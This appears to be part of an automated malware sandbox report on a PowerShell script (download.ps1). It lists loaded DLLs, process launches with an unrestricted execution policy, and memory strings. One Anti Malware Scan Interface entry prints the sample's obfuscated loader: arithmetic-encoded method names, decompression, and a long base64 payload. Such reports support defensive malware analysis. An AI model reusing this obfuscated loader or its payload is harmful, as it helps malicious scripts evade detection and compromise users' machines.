nonce="epDluNOoLrVXEHvCsvkULQ">(function(){google.xjs={basecomb:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJwAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oE_rtqVigwL0ao_oPopZIJptrYpfg',basecss:'/xjs/_/ss/k\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAsAAAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJw/rs\x3dACT90oF1BL3ZlaLO9UErlKWVa-MwNL-zZw',basejs:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/dg\x3d0/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA',excm:[]};})();</script> <script nonce="epDluNOoLrVXEHvCsvkULQ">(function(){var 
u='/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d3/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA/m\x3dsb_he,d';var st=1;var amd=1000;var mmd=0;var pod=true;
Source: powershell.exe, 00000000.00000002.1792974672.000001E28194A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basecomb:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Source: powershell.exe, 00000000.00000002.1792974672.000001E281E7A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basecomb:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJwAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oE_rtqVigwL0ao_oPopZIJptrYpfg
Source: classification engine | Classification label: mal60.evad.winPS1@2/7@2/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6644:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yjrg43zi.yqe.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress)) $pxso79gauievdqb.(([system.String]::new(@((166361/2483),(384171/(1130+2331)),(-5258+5370),(-7731+(10041-2189)),(7604-(19597120/2606)),(8753-8642)))))( $c3f8zdw7rg5ahto ) $pxso79gauievdqb.(([system.String]::new(@((9352-(37177140/4004)),(456192/4224),(-6769+(80+6800)),(-208+(-6187+(597+(14068-8155)))),(-6569+6670)))))()$nhvut5xwzaj3rgy.(([system.String]::new(@((237917/3551),(1085616/10052),(4015-(5446-(9650-8108))),(-8412+8527),(617918/(3034528/496))))))()[byte[]] $tos490z6qg18jkv = $c3f8zdw7rg5ahto.((-join (@((491400/(15110-(25233500/2725))),(996558/8978),(15925/(9664-(19354-9935))),(311448/(11471-(11931-3192))),(6658-6544),(49761/513),(-3536+(21905430/5990)))| ForEach-Object { [char]$_ })))() $q9lpzry8nioak2v=$tos490z6qg18jkv return $q9lpzry8nioak2v}[System.Text.Encoding]::ascii.((-join (@((2523-2452),(-4317+(-1948+(-780+7146))),(-7269+(14457-(12786-(44946324/7866)))),(989-(-3172+4078)),(-7895+(10112-(7645-5544))),(9469-(95570680/(52602184/(17939116/(17200508/(9048-4111)))))),(-2810+2915),(-3634+(24452064/(1012+(5828064/(2011-(10680-9725)))))),(462882/(14147-(19277-9624))))| ForEach-Object { [char]$_ })))((o1kytfw9q8rhup2gsci3j65vdmx 
"ePppNXh3aTRmbsmsPB58Ygry9hcikY33BxevfDfcnskAL6Q39D3/B3sTd8YCZm0aejr1HSrVwZ+PkfJYsp8ipMKv23NUSjJ5EJ48jhKiM2G32QPq0Y7vK+XpFkselIHAWM1f7EcJE02NBpNBmJG00LGOsLeR3afKvLracreoNahdEhvNi6+Xio7gmktdkafO1JbOG49gloxe0BDCFQYGzok6h1iFSYsQAOqMqs+sN35oALWRNy3vi1Te7Yq5kwXsPD2SA4CbE14PZ60wmkkEYrO1pk+rMvpUlc+HUCM05ufUm6BapcMMkMAOgo2qofksi7f+ChWQf3b7NOBiqJE4RrdWgSNflljCj0K+0ezEd2r4GVBLXAp2xrxIV8HL6nTxqlMK3EQaJ/G1x6oBMb9ufiUtRqWNEpp2+Hj8mJJ8dq6JX7kSkGmmr/L8Bx5cBiFErc8sbdmGJESYrVkKAwzchZq1XAsPkBZJlu6mOma4Fsucp5L2gpem+A94dys9slPN2LyuDjQZtkkVkVIhadCY6c3wOz8ZZrJ6vFuixQ1/BR/UPD++AthIo1M0/KSJqrkJsmmd9/KUkU3OH0aerj9cY3Rv8zh6E8Oi0veLrpvv/yrRvXkCwLezwPfZxgHmx1oMZ2zXA1Q0pOyrHeivFt9Q77uvHambP2RES7CPo+sEGjq/nxkeOdZ9Zq8RS1NXF4uN+r8HzaBoloy5EJvFurqqyMtMlozeVlVME466WreBBsTfo1rQrcwzKjM+M34u1AP9yhmkazf+xP5xTddfEpCV+HRbtHm6SrUGHk4aqTdRoBmtU3nassoxNnO7WMZ+8d9aR/ZZWit9F95f93eCN8sv7B2rR0dhXXd5pq8890mUi0mTGFksKxyAU7mZfMXE69NaxkgZqHhZ/ha0Ntzbnbl57d+OUE8p8g25Eb/WWsULGkabjp3Bj4OD4AaAitk5kZ7UMjEO04X8pOVtqcsYkE4OS0QNkcyX1ZHkkLayiLVh5kDLCJCxZJWp1xapi673/R0zvKyswm+MipMVWVNIgfcb51+A+q+buC776tnqt/wh0rGcWBv54dFC/0mS3Rm/wvZrNAHWBSQBsP6n1T+vYf5G+NTaJ40XK1Op60RZgX0wZF2UU3Yfm6MrjBl54BSS+9Qwx5W9qPh2KsaudLFZu6j08eIvABPQnyhykaVZToWJuplwqtnTJ01xrxVdhVVFamj8bXmpg7u67MWdv7/AqC6M6kQJkdqnp6nu2twA2IdJUm2BEZ8eoS/itZpNF+FPCAqLpDzfrb93UElUuY4gZub4NwZe5noaJmxCDMD5MFBHKp1coFFBUHG7YuV1R/RdcDxXAL+EL3WT0UqE0vAQ82YO1Un37JTqfyzCgf8dl5i28VdO4H/RJu09XV1aqXDTBr/l9SL9xxEHDB28bsSS5ZIUqu0zE5yMKIjoV7N9b+KV6Rkg7scVN7fARLzOPjMmhCiDcK0HruS1fYSUVmeXtd4zfXdKpOl5ho0jQns9JslAPEccjy2fH+nONj9qzyWO3104cfbdVbF2241HWYmp0lsdojUTKqXbWlCOdZp3i0QHMp9wTDU4/3tEuHyzm1KwfqWFQs5h9QYX3dsvcOOSFrzkau7s+Uz37lsvPEGkp5SXDnrVDQao4ezl6aNtUquDxdo1bdctBsZUtbp/8uaaflFyuAHeuILyX2v2LX+31AAgtI7UrLYVyXSrU+hbsBlpdxAZLY+7hVOX/P9BQ7gDngARRrV52rRZ+KZkCgP3LbRmmAUjP7K6UzB7JE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: linkinfo.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntshrui.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cscapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: taskflowdataengine.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cdp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dsreg.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: Binary string: mscorlib.pdbCLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 source: powershell.exe, 00000000.00000002.1826242579.000001E2F6C22000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1828378406.000001E2F8CE0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbSq$$u source: powershell.exe, 00000000.00000002.1831734156.000001E2F907F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb} source: powershell.exe, 00000000.00000002.1832085428.000001E2F90F3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: tomation.pdbue source: powershell.exe, 00000000.00000002.1829931432.000001E2F8F71000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 31bf3856ad364e35corlib.pdb source: powershell.exe, 00000000.00000002.1829931432.000001E2F8F71000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000000.00000002.1832557825.000001E2F9338000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdbM# source: powershell.exe, 00000000.00000002.1829931432.000001E2F8F71000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbG source: powershell.exe, 00000000.00000002.1832085428.000001E2F90F3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.1832557825.000001E2F9338000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1829931432.000001E2F8F71000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1832085428.000001E2F90F3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.1826242579.000001E2F6C22000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1828378406.000001E2F8CE0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdbh{ source: powershell.exe, 00000000.00000002.1826242579.000001E2F6C22000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD9B9BD2A5 pushad ; iretd 0_2_00007FFD9B9BD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD9BAD00BD pushad ; iretd 0_2_00007FFD9BAD00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD9BBAB353 push ss; iretd 0_2_00007FFD9BBAB382
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD9BBA8AA0 push FD9BCFDBh; iretd 0_2_00007FFD9BBA8AC2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD9BBA7A05 push es; ret 0_2_00007FFD9BBA7A17
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD9BD57854 push FD9BCF30h; iretd 0_2_00007FFD9BD5795A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD9BD857F4 push FD9BCF37h; iretd 0_2_00007FFD9BD85912
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD9BD83DD5 push eax; iretd 0_2_00007FFD9BD84291
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD9BD8350A push FD9BCF19h; iretd 0_2_00007FFD9BD8353A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD9BD86CC3 push FD9BCF6Eh; iretd 0_2_00007FFD9BD86CF2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD9BD86CC3 push edx; iretd 0_2_00007FFD9BD86DCB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD9BD84288 push eax; iretd 0_2_00007FFD9BD84291

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
